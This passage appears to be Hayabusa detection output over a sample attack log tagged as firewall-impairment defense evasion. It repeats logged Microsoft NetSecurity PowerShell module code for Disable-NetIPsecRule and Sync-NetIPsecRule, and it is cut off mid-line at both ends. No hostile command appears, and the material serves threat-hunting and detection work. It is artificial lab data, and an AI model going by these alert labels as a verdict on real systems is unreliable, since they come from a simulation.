[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilde",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"r.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${Asso",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"r.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = 